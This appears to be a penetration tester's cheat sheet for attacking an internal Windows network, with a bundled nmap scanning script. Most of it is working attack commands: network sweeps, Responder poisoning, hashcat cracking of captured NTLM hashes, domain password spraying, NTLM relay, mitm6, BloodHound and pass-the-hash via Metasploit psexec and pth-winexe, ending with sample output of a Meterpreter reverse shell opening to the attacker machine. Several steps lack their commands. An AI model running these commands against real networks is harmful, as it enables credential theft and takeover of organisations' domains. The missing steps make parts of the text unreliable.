If not given targets list try Nmap Ping Scan Private Ranges and start responder
sudo responder -I eth0
nmap -sn -n 10.0.0.0/8 | tee -a Targets.tmp
nmap -sn -n 172.16.0.0/12 | tee -a Targets.tmp
nmap -sn -n 192.168.0.0/16 | tee -a Targets.tmp
# Loud so only use if required
masscan 10.0.0.0/8 -p80,445,22 --rate 100000000 | tee -a Targets.tmp
masscan 172.16.0.0/12 -p80,445,22 --rate 100000000 | tee -a Targets.tmp
masscan 192.168.0.0/16 -p80,445,22 --rate 100000000 | tee -a Targets.tmp
#Note down IP addresses from responder
responder -I eth0
cat /usr/share/responder/logs/Responder-Session.log | grep answer | awk '{print $11}' | sort -u | tee -a Targets.tmp
#Note current IP address & scan range
ifconfig
nmap --top-ports 10 10.0.0.1/24 -Pn | tee -a Targets.tmp
#netdiscover
netdiscover -i eth0 -P
#NBTScan
nbtscan 192.168.1.0/24
Now cat grep and sort the IP addresses into a file called Targets.txt
If given a range do the following
Nmap Scans
Scanning
Start Nessus on discovered IP addresses
Run networkscan.sh against all targets.txt using rush
Modify if running slowly (thousands of hosts) and reduce the amount of ports it is looking at.
Find OS version with cme
Make a note of the domain etc and older OS's
Network Service Scan
Run this as root as some of the nmap scans require privs and sudo can be flakey
Requirements
Usage
Gather Webservers
Now open in firefox, check default creds etc
Scan with nuclei
Basic Vuln scan quick wins
Check responder for hashes and crack with hashcat
Once you have some hashes test with several wordlists, if none work then scrape the clients website for words with cewl
Then repeat the cracking process with a better password/rule list.
Domain enumeration
Get DC List
Get user list
Copy list of users to "rpcuserlist.txt" file and sort:
Password spray domain users
Set a timer for every 30 minutes and rerun this attack.
May be worth checking the password lockout policy with the client if in a sensitive environment.
When time is up change the password and rerun.
Passwords to try:
Find open file servers
SMB Map
Find open SMB shares which are available unauthenticated
Find open writable shares and search for authenticated file servers:
EyeWitness
NTLM Relay
Modify Responder.conf to turn off HTTP and SMB
Start responder
Create a list of targets with SMB signing disabled.
Now start ntlmrelayx.py against the targets
If you capture a high priv users account it will drop the hashes from the system
Now use psexec within metasploit to login to the target
Sometimes ntlmrelay fails, to fix, run the following
Pass the hash
Either will do, once the enumeration has finished upload the csv files to your attacker machine.
Then run
This will output the local hashes if you capture a domain admins NTLM hash.
Once you have this hash, login to the machine with metasploits psexec pass the hash or psexec.py
Bloodhound
Once on the domain as a windows user run the following:
Once on your attacker machine make sure you have bloodhound installed and then execute:
Visit 127.0.0.1:7687
Enter your password and upload the csv files you extracted from the target.
Click queries and then find shortest path to domain admin
MITM6
In a new window
Wait 30 mins to an hour for the IPV6 to update
Review ntlmrelayx.py output and look for new user and password added when a DA logs in
mkdir -p networkscan
cd networkscan
target=$(echo $1 | cut -d "/" -f 3)
userlist=~/jdksec/Payloads/top-usernames-shortlist.txt
passlist=~/jdksec/Payloads/darkweb2017-top100.txt
line="\n=====================\n"
mkdir -p $target
cd $target
mkdir nmap-basic
mkdir nmap-udp
echo "#####################################################################" | tee -a report-$target.txt
echo "Scan report for $target" |tee -a report-$target.txt
echo "#####################################################################" | tee -a report-$target.txt
echo "$line Nmap Scan for $target...$line " | tee -a report-$target.txt
ports=$(nmap -Pn -p- --min-rate=1000 -T4 $target | grep "^[0-9]" | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
echo "## Open Ports:\n";for i in $(echo $ports | sed 's/,/\n/g'); do echo $target:$i; done | tee -a ports-$target.txt
echo "\n"
nmap -Pn -sC -sV -p $ports $target -oN nmap-basic/$target
cat nmap-basic/* >> report-$target.txt
echo "$line Nmap UDP ...$line " | tee -a report-$target.txt
sudo nmap -sUVC --open $target --top-ports 20 -oN nmap-udp/$target
cat nmap-udp/* >> report-$target.txt
cd nmap-basic/
grep -Hari "/tcp" | grep -v ":|" >> ../services-$target.txt
cd ../
cd nmap-udp/
grep -Hari "/udp" | grep -v filtered >> ../services-$target.txt
cd ../
echo "$line Services ...$line " | tee -a report-$target.txt
cat services-$target.txt | tee -a report-$target.txt
echo "$line Ports ...$line " | tee -a report-$target.txt
cat ports-$target.txt | tee -a report-$target.txt
mv nmap-basic/$target nmap-tcp-$target.txt
mv nmap-udp/$target nmap-udp-$target.txt
/bin/rm -rf nmap-udp
/bin/rm -rf nmap-basic
cat networkscan/*/service* | cut -d '/' -f 1 | tee -a ports.txt | ~/go/bin/httprobe| tee -a webservers.txt
for i in $(cat webservers.txt); do firefox $i; sleep 1; done
cat webservers.txt | ~/go/bin/nuclei -nts -nc -silent | tee -a vulnscan.txt
msfconsole -qx "color false;use auxiliary/scanner/rdp/cve_2019_0708_bluekeep; set rhosts file://rdphosts.txt; set lhost eth0;run; quit" | grep -i "vulnerable" | tee -a vulnscan.txt
msfconsole -qx "color false;use auxiliary/scanner/smb/smb_ms17_010; set rhosts file://smbhosts.txt set lhost eth0;run; quit" | grep -i "vulnerable" | tee -a vulnscan.txt
cat /usr/share/responder/logs/*NTLM* | sort -u >> hashes.txt; cat hashes.txt | sort -u -o hashes.txt
hashcat --force -m 5600 hashes.txt /usr/share/wordlists/rockyou.txt
# Much Slower so use npk if possible or cloud cracker
wget https://raw.githubusercontent.com/NotSoSecure/password_cracking_rules/master/OneRuleToRuleThemAll.rule
hashcat --force -m 5600 hashes.txt /usr/share/wordlists/rockyou.txt -r OneRuleToRuleThemAll.rule
# Windows command
nltest /DCLIST:domain.local
# Linux Commands
cat /etc/resolv.conf
nmap -p 88,389,636 -iL targets.txt --open | tee -a domaincontrollers.txt
for i in (cat Targets.txt); do nslookup $i | grep "dc"; done
nslookup
> set type=all
_ldap._tcp.dc._msdcs.DOMAIN
msfconsole -q
set rhosts domaincontrollerip
use auxiliary/scanner/smb/smb_login
set SMBDomain domain
set USER_FILE DomainUsers.txt
set SMBPass firstpassword
date << adds a timestamp
run
for i in $(cat targets.txt);do smbmap -H $i; done | tee -a smbmap-output.txt
for i in $(cat targets.txt);do smbmap -u 'username' -p 'password' -d 'domain' -H $i; done | tee -a SMBMap-Output.txt
leafpad SMBMap-Output.txt
ctrl + f WRITE (Search for writable folders)
[Responder Core]
; Servers to start
SQL = On
SMB = Off << turn off
Kerberos = On
FTP = On
POP = On
SMTP = On
IMAP = On
HTTP = Off << turn off
HTTPS = On
DNS = On
LDAP = On
msfconsole
use exploit/windows/smb/psexec
set lhost 192.168.1.1
set rhost 192.168.1.11
set smbpass e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c
exploit
root@Kali:~# pth-winexe -U WORKGROUP/Administrator%aad3b435b51404eeaad3b435b51404ee:C0F2E311D3F450A7FF2571BB59FBEDE5 //192.168.1.25
# Where WORKGROUP is the default WORKGROUP. Can be replaced by a domain name
# Administrator: account's name
# aad3b435b51404eeaad3b435b51404ee: Empty LM HASH
# C0F2E311D3F450A7FF2571BB59FBEDE5: NTLM hash
root@Kali:~# pth-winexe -U WORKGROUP/Administrator%aad3b435b51404eeaad3b435b51404ee:C0F2E311D3F450A7FF2571BB59FBEDE5 //192.168.1.25 cmd.exe
E_md4hash wrapper called.
HASH PASS: Substituting user supplied NTLM HASH...
Microsoft Windows \[Version 6.3.9600\]
(c) 2013 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
Server\Administrator
msf > use auxiliary/admin/smb/psexec_command
msf auxiliary(psexec_command) > set SMBPass aad3b435b51404eeaad3b435b51404ee:C0F2E311D3F450A7FF2571BB59FBEDE5
msf exploit(psexec) > set SMBUser Administrator
msf exploit(psexec) > set SMBDomain WORKGROUP
msf exploit(psexec) > run
[*] Started reverse TCP handler on 192.168.1.24:4444
[*] 192.168.1.25:445 - Connecting to the server...
[*] 192.168.1.25:445 - Authenticating to 192.168.1.25:445|WORKGROUP as user 'administrator'...
[*] 192.168.1.25:445 - Selecting PowerShell target
[*] 192.168.1.25:445 - Executing the payload...
[+] 192.168.1.25:445 - Service start timed out, OK if running a command or non-service executable...
[*] Sending stage (957999 bytes) to 192.168.1.25
[*] Meterpreter session 1 opened (192.168.1.24:4444 -> 192.168.1.25:49173) at 2017-04-05 22:48:15 +0200
meterpreter > exit
